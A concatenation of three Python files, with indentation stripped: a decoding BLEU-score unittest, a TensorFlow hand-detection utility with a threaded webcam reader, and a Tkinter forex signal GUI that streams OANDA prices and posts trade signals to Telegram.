tf_bleu_score = translation_result_list[0].bleu_score.score
op_decoder_bleu_score = translation_result_list[1].bleu_score.score
op_decoding_bleu_score = translation_result_list[2].bleu_score.score
sys.stdout.flush()
if op_decoder_bleu_score >= tf_bleu_score - 1.0 and op_decoding_bleu_score >= tf_bleu_score - 1.0:
result.value = 1
else:
result.value = 0
def test_decoding_beamsearch_fp32(self):
os.system("./bin/decoding_gemm 32 4 8 64 32001 128 512 0")
self.check_result(4, 'fp32', '012', batch_size=32)
def test_decoding_beamsearch_fp16(self):
os.system("./bin/decoding_gemm 32 4 8 64 32001 128 512 1")
self.check_result(4, 'fp16', '012', batch_size=32)
def test_decoding_beamsearch_fp32_2(self):
os.system("./bin/decoding_gemm 16 32 8 64 32001 128 512 0")
self.check_result(32, 'fp32', '012', batch_size=16)
def test_decoding_beamsearch_fp16_2(self):
os.system("./bin/decoding_gemm 16 32 8 64 32001 128 512 1")
self.check_result(32, 'fp16', '012', batch_size=16)
def test_decoding_topk_sampling_fp32(self):
os.system("./bin/decoding_gemm 128 1 8 64 32001 128 512 0")
self.check_result(1, 'fp32', '345', 4, 0.0)
def test_decoding_topk_sampling_fp16(self):
os.system("./bin/decoding_gemm 128 1 8 64 32001 128 512 1")
self.check_result(1, 'fp16', '345', 4, 0.0)
def test_decoding_topk_sampling_fp32_2(self):
os.system("./bin/decoding_gemm 128 1 8 64 32001 128 512 0")
self.check_result(1, 'fp32', '345', 64, 0.0)
def test_decoding_topk_sampling_fp16_2(self):
os.system("./bin/decoding_gemm 128 1 8 64 32001 128 512 1")
self.check_result(1, 'fp16', '345', 64, 0.0)
def test_decoding_topp_sampling_fp32(self):
os.system("./bin/decoding_gemm 128 1 8 64 32001 128 512 0")
self.check_result(1, 'fp32', '345', 0, 0.5)
def test_decoding_topp_sampling_fp16(self):
os.system("./bin/decoding_gemm 128 1 8 64 32001 128 512 1")
self.check_result(1, 'fp16', '345', 0, 0.5)
def test_decoding_topp_sampling_fp32_2(self):
os.system("./bin/decoding_gemm 128 1 8 64 32001 128 512 0")
self.check_result(1, 'fp32', '345', 0, 0.9)
def test_decoding_topp_sampling_fp16_2(self):
os.system("./bin/decoding_gemm 128 1 8 64 32001 128 512 1")
self.check_result(1, 'fp16', '345', 0, 0.9)
if __name__ == "__main__":
unittest.main()
|
detector_utils.py
|
# Utilities for object detector.
import numpy as np
import sys
import tensorflow as tf
import os
from threading import Thread
from datetime import datetime
import cv2
from utils import label_map_util
from collections import defaultdict
detection_graph = tf.Graph()
sys.path.append("..")
# score threshold for showing bounding boxes.
_score_thresh = 0.27
MODEL_NAME = 'hand_inference_graph'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join(MODEL_NAME, 'hand_label_map.pbtxt')
NUM_CLASSES = 1
# load label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(
label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Load a frozen infrerence graph into memory
def load_inference_graph():
# load frozen tensorflow model into memory
print("> ====== loading HAND frozen graph into memory")
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph)
print("> ====== Hand Inference graph loaded.")
return detection_graph, sess
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
# TODO allow for the score to be used here
def draw_tracked_box_on_image(tracks, im_width, im_height, image_np, score_thresh=0.2):
for i, track in enumerate(tracks):
if (track[5] > score_thresh):
(left, right, top, bottom) = (track[1] * im_width, track[3] * im_width,
track[0] * im_height, track[2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 3, 1)
cv2.putText(image_np, str(track[4]) + ': ' + str(track[5]),
(int(track[1] * im_width), int(track[2] * im_height + 10)),
cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 3)
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 3, 1)
cv2.putText(image_np, str(scores[i]), (int(boxes[i][1] * im_width), int(boxes[i][2] * im_height- 10)), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 3)
# Show fps value on image.
def draw_fps_on_image(fps, image_np):
cv2.putText(image_np, fps, (20, 50),
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (77, 255, 9), 2)
# Actual detection .. generate scores and bounding boxes given an image
def detect_objects(image_np, detection_graph, sess):
# Definite input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores)
# Code to thread reading camera input.
# Source : Adrian Rosebrock
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def size(self):
# return size of the capture device
return self.stream.get(3), self.stream.get(4)
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
automated_gui.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat May 25 02:21:40 2019
@author: kenneth
"""
import time
from STOCK import stock
import os
import requests
import numpy as np
import pandas as pd
import tkinter as tk
from tkinter import ttk
from oandapyV20 import API
from mpl_finance import candlestick2_ohlc
from oandapyV20.endpoints.pricing import PricingStream
from threading import Thread
from queue import Queue
from Automated_Signal_generator import (signalStrategy, Signal,
Run)
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
#%%
#stream live quotes
class streamer(ttk.Frame):
def __init__(self, master = None, path = None):
ttk.Frame.__init__(self, master)
# self.master = master
self.path = path
self.run()
def stream(self):
try:
rowDisplaced = 4
data = pd.read_csv(os.path.join(self.path['mainPath'], "TICKERS/streams.csv")).iloc[:, 1:]
data.sort_values(['tickers'], inplace = True)
for enum, (index, row) in enumerate(data.iterrows()):
if row['direction'] == '^':
#--tickers
label = tk.Button(self, width = 9, height = 2, \
text = row['tickers'])
label.configure(text= "{}".format(row['tickers']))
label.grid(row = enum+rowDisplaced, column =0)
#--bids
label2 = tk.Button(self, width = 9, height = 2, \
text = round(row['bids'], 5), bg= "#42f55a")
label2.configure(text= "{}".format(round(row['bids'], 5)))
label2.grid(row = enum+rowDisplaced, column =1)
#--asks
label3 = tk.Button(self, width = 9, height = 2, \
text = round(row['asks'], 5), bg= "#42f55a")
label3.configure(text= "{}".format(round(row['asks'], 5)))
label3.grid(row = enum+rowDisplaced, column =2)
#--direction
label4 = tk.Button(self, width = 9, height = 2, \
text = row['direction'], bg= "#42f55a")
label4.configure(text= "{}".format(row['direction']))
label4.grid(row = enum+rowDisplaced, column =3)
elif row['direction'] == 'v':
#--tickers
label = tk.Button(self, width = 9, height = 2, \
text = row['tickers'])
label.configure(text= "{}".format(row['tickers']))
label.grid(row = enum+rowDisplaced, column =0)
#--bids
label2 = tk.Button(self, width = 9, height = 2, \
text = round(row['bids'], 5), bg= "#f54242")
label2.configure(text= "{}".format(round(row['bids'], 5)))
label2.grid(row = enum+rowDisplaced, column =1)
#--asks
label3 = tk.Button(self, width = 9, height = 2, \
text = round(row['asks'], 5), bg= "#f54242")
label3.configure(text= "{}".format(round(row['asks'], 5)))
label3.grid(row = enum+rowDisplaced, column =2)
#--direction
label4 = tk.Button(self, width = 9, height = 2, \
text = row['direction'], bg= "#f54242")
label4.configure(text= "{}".format(row['direction']))
label4.grid(row = enum+rowDisplaced, column =3)
except:
pass
def run(self):
try:
self.stream()
self.after(1000, self.run)
except:
pass
#--telegram bot
class telegramBot(object):
def __init__(self, path):
self.path = path
return
def flag(self, code):
OFFSET = 127462 - ord('A')
code = code.upper()
return chr(ord(code[0]) + OFFSET) + chr(ord(code[1]) + OFFSET)
def tgsignal(self, signal):
import telegram
with open(os.path.join(self.path['mainPath'], self.path['telegram'])) as tgt:
token, chatID= tgt.readlines()
token = token.strip()
chatID = chatID.strip()
bot = telegram.Bot(token = token)
text = '<b> ✅✅✅✅ AI SIGNAL GENERATOR ✅✅✅✅ </b>\n\n'
flags = {'AUD_USD': (self.flag('au'), self.flag('us')),
'BCO_USD': (self.flag('gb'), self.flag('us')),
'BTC_USD': (self.flag('us'), self.flag('us')),
'DE30_EUR': (self.flag('de'), self.flag('eu')),
'EUR_AUD': (self.flag('eu'), self.flag('au')),
'EUR_JPY': (self.flag('eu'), self.flag('jp')),
'EUR_USD': (self.flag('eu'), self.flag('us')),
'GBP_JPY': (self.flag('gb'), self.flag('jp')),
'GBP_USD': (self.flag('gb'), self.flag('us')),
'NAS100_USD': (self.flag('us'), self.flag('us')),
'SPX500_USD': (self.flag('us'), self.flag('us')),
'US30_USD': (self.flag('us'), self.flag('us')),
'USD_CAD': (self.flag('us'), self.flag('ca')),
'USD_JPY': (self.flag('us'), self.flag('jp')),
'XAU_USD': (self.flag('us'), self.flag('us'))}
for index, sig in signal.iterrows():
if sig['position'] == 'BUY':
for ii, ij in flags.items():
if sig['pair'] == ii:
text += f"<b> {ij[0]}{sig['pair']}{ij[1]}</b>\n\
<i>POSITION: 🔵{sig['position']}</i>\n\
<i>TIME: 🕖 {sig['time']}</i>\n\
<i>@ 🔺{sig['close']}</i>\n\
<i>TP1: {sig['tp1']}</i>\n\
<i>TP2: {sig['tp2']}</i>\n\
<i>TP3: {sig['tp3']}</i>\n\
<i>SL: {sig['sl']}</i>\n"
elif sig['position'] == 'SELL':
for ii, ij in flags.items():
if sig['pair'] == ii:
text += f"<b> {ij[0]}{sig['pair']}{ij[1]}</b>\n\
<i>POSITION: 🔴{sig['position']}</i>\n\
<i>TIME: 🕖 {sig['time']}</i>\n\
<i>@ 🔻{sig['close']}</i>\n\
<i>TP1: {sig['tp1']}</i>\n\
<i>TP2: {sig['tp2']}</i>\n\
<i>TP3: {sig['tp3']}</i>\n\
<i>SL: {sig['sl']}</i>\n"
else:
for ii, ij in flags.items():
if sig['pair'] == ii:
text += f"<b> {ij[0]}{sig['pair']}{ij[1]}</b>\n\
<i>POSITION: ⚫️{sig['position']}</i>\n\
<i>TIME: 🕖 {sig['time']}</i>\n\
<i>@ {sig['close']}</i>\n"
return bot.send_message(chat_id=chatID,
text=text,
parse_mode=telegram.ParseMode.HTML)
#stream and autoupdate signal
class streamSignal(ttk.Frame):
def __init__(self, master, path):
ttk.Frame.__init__(self, master)
self.path = path
self.frameSettings = ttk.Frame(self, relief=tk.RAISED, borderwidth=1)
frameGB = ttk.Frame(self.frameSettings)
style = ttk.Style()
style.map('TCombobox', fieldbackground=[('readonly','#e3104f')])
style.map('TCombobox', selectbackground=[('readonly', '#e3104f')])
style.map('TCombobox', selectforeground=[('readonly', 'white')])
strategy = tk.Label(frameGB, text = 'Strategy').grid(row = 1, column = 0)
self.strategyEntry = ttk.Combobox(frameGB, values = self.path['strategy'], state = 'readonly', width = 8)
self.strategyEntry.current(32)
self.strategyEntry.focus()
self.strategyEntry.bind("<<ComboboxSelected>>", self.callback)
'''Edit Strategy here'''
self.strategyEntry.grid(row = 1, column = 1, padx = 10, pady = 5)
deviation = tk.Label(frameGB, text = 'Deviation').grid(row = 2, column = 0, padx = 10, pady = 5)
self.deviationEntry = tk.Entry(frameGB, width = 10, fg = 'white', bg = '#e3104f')
self.deviationEntry.insert(tk.END, 2)
self.deviationEntry.grid(row = 2, column = 1, padx = 10, pady = 5)
multiplier = tk.Label(frameGB, text = 'Multiplier').grid(row = 3, column = 0, padx = 10, pady = 5)
self.multiplierEntry = tk.Entry(frameGB, width = 10, fg = 'white', bg = '#e3104f')
self.multiplierEntry.insert(tk.END, 2)
self.multiplierEntry.grid(row = 3, column = 1, padx = 10, pady = 5)
period = tk.Label(frameGB, text = 'Period').grid(row = 4, column = 0, padx = 10, pady = 5)
self.periodEntry = tk.Entry(frameGB, width = 10, fg = 'white', bg = '#e3104f')
self.periodEntry.insert(tk.END, 20)
self.periodEntry.grid(row = 4, column = 1, padx = 10, pady = 5)
frameGB.grid(row = 1, column = 0, padx = 10, pady = 10)
#--ATR and RSI
frameRSI = ttk.Frame(self.frameSettings)
period_atr = tk.Label(frameRSI, text = 'Period ATR').grid(row = 1, column = 1, padx = 10, pady = 5)
self.period_atrEntry = tk.Entry(frameRSI, width = 10, fg = 'white', bg = '#e3104f')
self.period_atrEntry.insert(tk.END, 14)
self.period_atrEntry.grid(row = 1, column = 2, padx = 10, pady = 5)
period_alpha = tk.Label(frameRSI, text = 'Period alpha').grid(row = 2, column = 1, padx = 10, pady = 5)
self.period_alphaE = tk.Entry(frameRSI, width = 10, fg = 'white', bg = '#e3104f')
self.period_alphaE.insert(tk.END, 10)
self.period_alphaE.grid(row = 2, column = 2, padx = 10, pady = 5)
period_beta = tk.Label(frameRSI, text = 'Period beta').grid(row = 3, column = 1, padx = 10, pady = 5)
self.period_betaE = tk.Entry(frameRSI, width = 10, fg = 'white', bg = '#e3104f')
self.period_betaE.insert(tk.END, 20)
self.period_betaE.grid(row = 3, column = 2, padx = 10, pady = 5)
frameRSI.grid(row = 1, column = 1, padx = 10, pady = 10)
frameMACD = ttk.Frame(self.frameSettings)
fast = tk.Label(frameMACD, text = 'Fast').grid(row = 1, column = 2, padx = 10, pady = 5)
self.fastEntry = tk.Entry(frameMACD, width = 10, fg = 'white', bg = '#e3104f')
self.fastEntry.insert(tk.END, 12)
self.fastEntry.grid(row = 1, column = 3, padx = 10, pady = 5)
slow = tk.Label(frameMACD, text = 'Slow').grid(row = 2, column = 2, padx = 10, pady = 5)
self.slowEntry = tk.Entry(frameMACD, width = 10, fg = 'white', bg = '#e3104f')
self.slowEntry.insert(tk.END, 26)
self.slowEntry.grid(row = 2, column = 3, padx = 10, pady = 5)
signal = tk.Label(frameMACD, text = 'Signal').grid(row = 3, column = 2, padx = 10, pady = 5)
self.signalEntry = tk.Entry(frameMACD, width = 10, fg = 'white', bg = '#e3104f')
self.signalEntry.insert(tk.END, 9)
self.signalEntry.grid(row = 3, column = 3, padx = 10, pady = 5)
frameMACD.grid(row = 1, column = 2, padx = 10, pady = 10)
frameRSI = ttk.Frame(self.frameSettings)
LB = tk.Label(frameRSI, text = 'Lower bound').grid(row = 1, column = 3, padx = 10, pady = 5)
self.LBEntry = tk.Entry(frameRSI, width = 10, fg = 'white', bg = '#e3104f')
self.LBEntry.insert(tk.END, 30)
self.LBEntry.grid(row = 1, column = 4, padx = 10, pady = 5)
UB = tk.Label(frameRSI, text = 'Higher bound').grid(row = 2, column = 3, padx = 10, pady = 5)
self.UBEntry = tk.Entry(frameRSI, width = 10, fg = 'white', bg = '#e3104f')
self.UBEntry.insert(tk.END, 70)
self.UBEntry.grid(row = 2, column = 4, padx = 10, pady = 5)
Midline = tk.Label(frameRSI, text = 'Midline').grid(row = 3, column = 3, padx = 10, pady = 5)
self.MidlineEntry = tk.Entry(frameRSI, width = 10, fg = 'white', bg = '#e3104f')
self.MidlineEntry.insert(tk.END, 0)
self.MidlineEntry.grid(row = 3, column = 4, padx = 10, pady = 5)
frameRSI.grid(row = 1, column = 4, padx = 10, pady = 10)
frameTF = ttk.Frame(self.frameSettings)
timeframe = tk.Label(frameTF, text = 'TimeFrame').grid(row = 1, column = 4)
self.timeframeEntry = ttk.Combobox(frameTF, values = self.path['timeframes'], width = 8)
self.timeframeEntry['state'] = 'readonly'
self.timeframeEntry.current(2)
self.timeframeEntry.grid(row = 1, column = 5, padx = 10, pady = 5)
self.timeframeEntry.bind("<<ComboboxSelected>>", self.callback)
time = tk.Label(frameTF, text = 'Timer').grid(row = 2, column = 4, padx = 10, pady = 5)
self.timeEntry = ttk.Combobox(frameTF, values = self.path['timeframes'], width = 8)
self.timeEntry['state'] = 'readonly'
self.timeEntry.current(1)
self.timeEntry.grid(row = 2, column = 5, padx = 10, pady = 5)
self.timeEntry.bind("<<ComboboxSelected>>", self.callback)
frameTF.grid(row = 1, column = 5, padx = 10, pady = 10)
#setting frame
self.frameSettings.grid(row = 0, column = 0)
self.timeframe = timeframe
return self.runSignal()
#--callback
def callback(self, eventObject):
return eventObject.widget.get()
def liveSignal(self):
'''Docstring
:params: None
:Returntype: a list of last signal positions
'''
self.pairs = self.path['instruments'].split(',')
openPositions = []
for st in self.pairs:
data = pd.read_csv(os.path.join(self.path['mainPath'], f"{self.path['predicted']}/STRATEGY_{self.strategyEntry.get()}/{self.timeframe}/{st}"+".csv"))
stockData = stock(data)
data['ATR'] = stockData.ATR(data, int(self.periodEntry.get()))
position = data.Position[0]
time = data.timestamp[0]
close = data.Close[0]
atrVal = data.ATR[0]
for day, pos, cl, atr in zip(data.timestamp.values, data.Position.values, data.Close.values, data.ATR.values):
if position == pos:
pass
else:
position = pos
time = day
close = cl
atrVal = atr
if position == 'BUY':
if len(str(close).split('.')[0]) > 1:
tp1 = round(abs(close + 6*atrVal), 2)
tp2 = round(abs(close + 10*atrVal), 2)
tp3 = round(abs(close + 15*atrVal), 2)
sl = round(abs(close - 2*atrVal), 2)
else:
tp1 = round(abs(close + 6*atrVal), 5)
tp2 = round(abs(close + 10*atrVal), 5)
tp3 = round(abs(close + 15*atrVal), 5)
sl = round(abs(close - 2*atrVal), 5)
elif position == 'SELL':
if len(str(close).split('.')[0]) > 1:
tp1 = round(abs(close - 6*atrVal), 2)
tp2 = round(abs(close - 10*atrVal), 2)
tp3 = round(abs(close - 15*atrVal), 2)
sl = round(abs(close + 2*atrVal), 2)
else:
tp1 = round(abs(close - 6*atrVal), 5)
tp2 = round(abs(close - 10*atrVal), 5)
tp3 = round(abs(close - 15*atrVal), 5)
sl = round(abs(close + 2*atrVal), 5)
else:
if len(str(close).split('.')[0]) > 1:
tp1 = round(close, 2)
tp2 = round(close, 2)
tp3 = round(close, 2)
sl = round(close, 2)
else:
tp1 = round(close, 5)
tp2 = round(close, 5)
tp3 = round(close, 5)
sl = round(close, 5)
#append result: Store in database & pass to GUI
openPositions.append([st, position, time, close, tp1, tp2, tp3, sl])
columns = ['pair', 'position', 'time', 'close', 'tp1', 'tp2', 'tp3', 'sl']
if not os.path.exists(os.path.join(path['mainPath'], path['signals']+'/signals.csv')):
signal = pd.DataFrame(openPositions, columns = columns)
signal.to_csv(os.path.join(path['mainPath'], path['signals']+'/signals.csv'))
#--Return telegram
telegramBot(self.path).tgsignal(signal)
else:
oldSignal = pd.read_csv(os.path.join(path['mainPath'], path['signals']+'/signals.csv')).iloc[:, 1:]
newSignal = pd.DataFrame(openPositions, columns = columns)
if oldSignal['position'].equals(newSignal['position']):
pass
else:
newSignal['update'] = np.where(oldSignal['position'] == newSignal['position'], np.nan, newSignal.position)
updateSignal = newSignal.dropna().drop(['update'], axis = 1)
newSignal.drop(['update'], axis = 1, inplace = True)
newSignal.to_csv(os.path.join(path['mainPath'], path['signals']+'/signals.csv'))
#--Return telegram
telegramBot(self.path).tgsignal(updateSignal)
return openPositions
def signalGUI(self):
#Run automated signal
self.strategy = str(self.strategyEntry.get())
self.pairs = self.path['instruments'].split(',')
self.dev = int(self.deviationEntry.get())
self.mul = int(self.multiplierEntry.get())
self.period = int(self.periodEntry.get())
self.lwbound = int(self.LBEntry.get())
self.upbound = int(self.UBEntry.get())
self.midline = int(self.MidlineEntry.get())
self.fast = int(self.fastEntry.get())
self.slow = int(self.slowEntry.get())
self.signal = int(self.signalEntry.get())
self.timeframe = str(self.timeframeEntry.get())
self.palpha = int(self.period_alphaE.get())
self.pbeta = int(self.period_betaE.get())
self.periodatr = int(self.period_atrEntry.get())
#--Run signal
Run(path = self.path, strategy = self.strategy, STOCKLIST = self.pairs, DEVIATION = self.dev, MULTIPLIER = self.mul, PERIOD = self.period, LOWER_BOUND = self.lwbound,\
UPPER_BOUND = self.upbound, MIDLINE = self.midline, FAST = self.fast, SLOW = self.slow, SIGNAL = self.signal, TIMEFRAME = self.timeframe,\
PERIOD_ALPHA = self.palpha, PERIOD_BETA = self.pbeta, PERIODATR = self.periodatr)
#throw signal
self.Sigframe = ttk.Frame(self)
openPositions = self.liveSignal()
#--return GUI
rowDisplaced = 6
for enum, signal in enumerate(openPositions):
if signal[1] == 'BUY':
#--buy/sell/EXIT
#--stock
butnpair = tk.Button(self.Sigframe, width = 9, height = 2, \
text = signal[0])
butnpair.grid(row = enum+rowDisplaced, column =0)
#--position
butnPos = tk.Button(self.Sigframe, width = 9, height = 2, \
text = signal[1], bg= "#42f55a")
butnPos.configure(text= "{}".format(signal[1]))
butnPos.grid(row = enum+rowDisplaced, column =1)
#--datetime
butnDate = tk.Button(self.Sigframe, width = 20, height = 2, \
text = signal[2], bg= "#42f55a")
butnDate.configure(text= "{}".format(signal[2]))
butnDate.grid(row = enum+rowDisplaced, column =2)
#--close
butnClose = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[3], 5), bg= "#42f55a")
butnClose.configure(text= "@{}".format(round(signal[3], 5)))
butnClose.grid(row = enum+rowDisplaced, column =3)
#--tp1
butnTP = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[4], 5), bg= "#42f55a")
butnTP.configure(text= "TP1:{}".format(round(signal[4], 5)))
butnTP.grid(row = enum+rowDisplaced, column =4)
#--tp2
butnTP = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[5], 5), bg= "#42f55a")
butnTP.configure(text= "TP2:{}".format(round(signal[5], 5)))
butnTP.grid(row = enum+rowDisplaced, column =5)
#--tp3
butnTP = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[6], 5), bg= "#42f55a")
butnTP.configure(text= "TP3:{}".format(round(signal[6], 5)))
butnTP.grid(row = enum+rowDisplaced, column =6)
#--sl
butnSL = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[7], 5), bg= "#42f55a")
butnSL.configure(text= "SL:{}".format(round(signal[7], 5)))
butnSL.grid(row = enum+rowDisplaced, column =7)
elif signal[1] == 'SELL':
#--stock
butnpair = tk.Button(self.Sigframe, width = 9, height = 2, \
text = signal[0])
butnpair.grid(row = enum+rowDisplaced, column =0)
#--position
butnPos = tk.Button(self.Sigframe, width = 9, height = 2, \
text = signal[1], bg= "#f54242")
butnPos.configure(text= "{}".format(signal[1]))
butnPos.grid(row = enum+rowDisplaced, column =1)
#--datetime
butnDate = tk.Button(self.Sigframe, width = 20, height = 2, \
text = signal[2], bg= "#f54242")
butnDate.configure(text= "{}".format(signal[2]))
butnDate.grid(row = enum+rowDisplaced, column =2)
#--close
butnClose = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[3], 5), bg= "#f54242")
butnClose.configure(text= "@{}".format(round(signal[3], 5)))
butnClose.grid(row = enum+rowDisplaced, column =3)
#--tp1
butnTP = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[4], 5), bg= "#f54242")
butnTP.configure(text= "TP1:{}".format(round(signal[4], 5)))
butnTP.grid(row = enum+rowDisplaced, column =4)
#--tp2
butnTP = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[5], 5), bg= "#f54242")
butnTP.configure(text= "TP2:{}".format(round(signal[5], 5)))
butnTP.grid(row = enum+rowDisplaced, column =5)
#--tp3
butnTP = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[6], 5), bg= "#f54242")
butnTP.configure(text= "TP3:{}".format(round(signal[6], 5)))
butnTP.grid(row = enum+rowDisplaced, column =6)
#--sl
butnSL = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[7], 5), bg= "#f54242")
butnSL.configure(text= "SL:{}".format(round(signal[7], 5)))
butnSL.grid(row = enum+rowDisplaced, column =7)
else:
#--stock
butnpair = tk.Button(self.Sigframe, width = 9, height = 2, \
text = signal[0])
butnpair.grid(row = enum+rowDisplaced, column =0)
#--position
butnPos = tk.Button(self.Sigframe, width = 9, height = 2, \
text = signal[1])
butnPos.configure(text= "{}".format(signal[1]))
butnPos.grid(row = enum+rowDisplaced, column =1)
#--datetime
butnDate = tk.Button(self.Sigframe, width = 20, height = 2, \
text = signal[2])
butnDate.configure(text= "{}".format(signal[2]))
butnDate.grid(row = enum+rowDisplaced, column =2)
#--close
butnClose = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[3], 5))
butnClose.configure(text= "@{}".format(round(signal[3], 5)))
butnClose.grid(row = enum+rowDisplaced, column =3)
#--tp1
butnTP = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[4], 5))
butnTP.configure(text= "TP1:{}".format(round(signal[4], 5)))
butnTP.grid(row = enum+rowDisplaced, column =4)
#--tp2
butnTP = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[5], 5))
butnTP.configure(text= "TP2:{}".format(round(signal[5], 5)))
butnTP.grid(row = enum+rowDisplaced, column =5)
#--tp3
butnTP = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[6], 5))
butnTP.configure(text= "TP3:{}".format(round(signal[6], 5)))
butnTP.grid(row = enum+rowDisplaced, column =6)
#--sl
butnSL = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[7], 5))
butnSL.configure(text= "SL:{}".format(round(signal[7], 5)))
butnSL.grid(row = enum+rowDisplaced, column =7)
self.Sigframe.grid(row = 5, column = 0, pady = 5)
#run auto updates
def runSignal(self):
self.timer = str(self.timeEntry.get())
if self.timer == 'M15':
self.time = 900000
elif self.timer == 'M30':
self.time = 1800000
elif self.timer == 'H1':
self.time = 3600000
elif self.timer == 'H2':
self.time = 7200000
elif self.timer == 'H3':
self.time = 10800000
elif self.timer == 'H4':
self.time = 14400000
elif self.timer == 'H6':
self.time = 21600000
elif self.timer == 'H8':
self.time = 28800000
elif self.timer == 'H12':
self.time = 43200000
elif self.timer == 'D1':
self.time = 86400000
else:
self.time = 900000
self.signalGUI()
self.after(self.time, self.runSignal)
#--Quote
class Quote():
def __init__(self, path):
'''Docstring
params: path: dictionary of mainpath, account path and
token path
return type: None
'''
self.path = path
self.quoteStreamer()
def accountDetails(self):
#account -ID
with open(os.path.join(self.path['mainPath'], self.path['acountPath'])) as acc:
accountID = acc.readline().strip()
#token
with open(os.path.join(self.path['mainPath'], self.path['tokenPath'])) as tok:
token = tok.readline().strip()
#account API
api = API(access_token=token, environment=self.path['environment'])
return accountID, api
def arrowHead(self, prev, new):
'''Docstring
function compares previous bid price with
new bid and return direction.
:params: prev: previous bid price
:params: new: new bid price
:Return type: ^ Up
v Down
'''
if new > prev:
return '^'
else:
return 'v'
def quoteStreamer(self):
AccID, api = self.accountDetails()
if not os.path.exists(os.path.join(self.path['mainPath'], 'TICKERS')):
os.makedirs(os.path.join(self.path['mainPath'], 'TICKERS'))
try:
while True:
n = 0
s = PricingStream(accountID=AccID, params={"instruments": self.path['instruments']})
tickers = []
try:
for R in api.request(s):
if R['type'] == 'PRICE':
rec = {'tickers': R['instrument'], 'bids': R['bids'][0]['price'], 'asks': R['asks'][0]['price'], 'direction': 'v'}
if len(tickers)+1 <= len(self.path['instruments'].split(',')):
tickers.append(rec)
else:
for enum, ii in enumerate(tickers):
previous_bid = tickers[enum]['bids']
if tickers[enum]['tickers'] == R['instrument']:
tickers[enum]['bids'] = R['bids'][0]['price']
tickers[enum]['asks'] = R['asks'][0]['price']
tickers[enum]['direction'] = self.arrowHead(previous_bid, tickers[enum]['bids'])
df = pd.DataFrame([tic for tic in tickers], columns=['tickers', 'bids', 'asks', 'direction'])
df.to_csv(os.path.join(self.path['mainPath'], 'TICKERS/streams.csv'))
print(tickers)
else:
rec = {'tickers': R['instrument'], 'bids': R['bids'][0]['price'], 'asks': R['asks'][0]['price'], 'direction': 'v'}
if len(tickers)+1 <= len(self.path['instruments'].split(',')):
tickers.append(rec)
else:
for enum, ii in enumerate(tickers):
previous_bid = tickers[enum]['bids']
if tickers[enum]['tickers'] == R['instrument']:
tickers[enum]['bids'] = R['bids'][0]['price']
tickers[enum]['asks'] = R['asks'][0]['price']
